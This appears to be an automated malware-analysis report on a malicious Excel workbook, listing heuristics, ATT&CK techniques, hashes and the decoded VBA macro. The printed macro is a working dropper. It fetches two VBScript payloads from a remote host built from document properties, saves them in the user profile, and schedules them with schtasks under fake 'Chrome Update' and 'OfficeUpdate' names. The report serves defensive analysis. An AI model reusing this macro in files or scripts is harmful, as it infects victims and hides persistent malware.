MALICIOUS
208
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The VBA macro executes a Workbook_Open subroutine which uses MSXML2.serverxmlhttp to download content from two URLs constructed from document properties. These downloaded contents are saved as VBScript files in the user's profile directory. Subsequently, the macro attempts to schedule these VBScript files to execute using schtasks, indicating a downloader or dropper functionality.
Heuristics 6
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1978 bytes |
SHA-256: fe7fedcb22a5c07ebe652ee5634d6fc7f2326688883dc69bb8659a7e4dd7dfa7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
Openn
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Public Function Openn()
Dim xmlhttp, myurl, myurl2 As String
Dim Titi, Aut
Set xmlhttp = CreateObject("MSXML2.serverxmlhttp")
Titi = ActiveWorkbook.BuiltinDocumentProperties("Title")
Aut = ActiveWorkbook.BuiltinDocumentProperties("Author")
myurl = Aut & Titi + ".cc/zzttzz"
xmlhttp.Open "GET", myurl, False
xmlhttp.Send
Total = xmlhttp.responsetext
' second file
myurl2 = Aut & Titi + ".cc/ccddc"
xmlhttp.Open "GET", myurl2, False
xmlhttp.Send
Total2 = xmlhttp.responsetext
Dim Fileout As Object
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
SPath = Environ("USERPROFILE") & "\Users.v" & "bs"
sPath2 = Environ("USERPROFILE") & "\Profile.vb" + "s"
Set Fileout = fso.CreateTextFile(SPath, True, True)
Fileout.Write Total
Fileout.Close
Set Fileout = fso.CreateTextFile(sPath2, True, True)
Fileout.Write Total2
Fileout.Close
Ora_X = TimeValue("" & Hour(Now) & ":" & Minute(Now) + 1 & ":" & Second(Now))
PKill2 = "Schtasks /Create /SC ONCE /ST " & Ora_X & " /TN ""Google Chrome Update"" /TR " & sPath2 & " /F"
PKill = "Schtasks /Create /SC minute /mo 10 /TN ""OfficeUpdate"" /TR " & SPath & " /F"
Shell (PKill2)
Shell (PKill)
End Function
Attribute VB_Name = "Module2"
Attribute VB_Name = "Module3"
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 19456 bytes |
SHA-256: 2bccf4fc8ec07916b292ec407b5a67e617957bfa3e14ae6d180214abb0614938 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.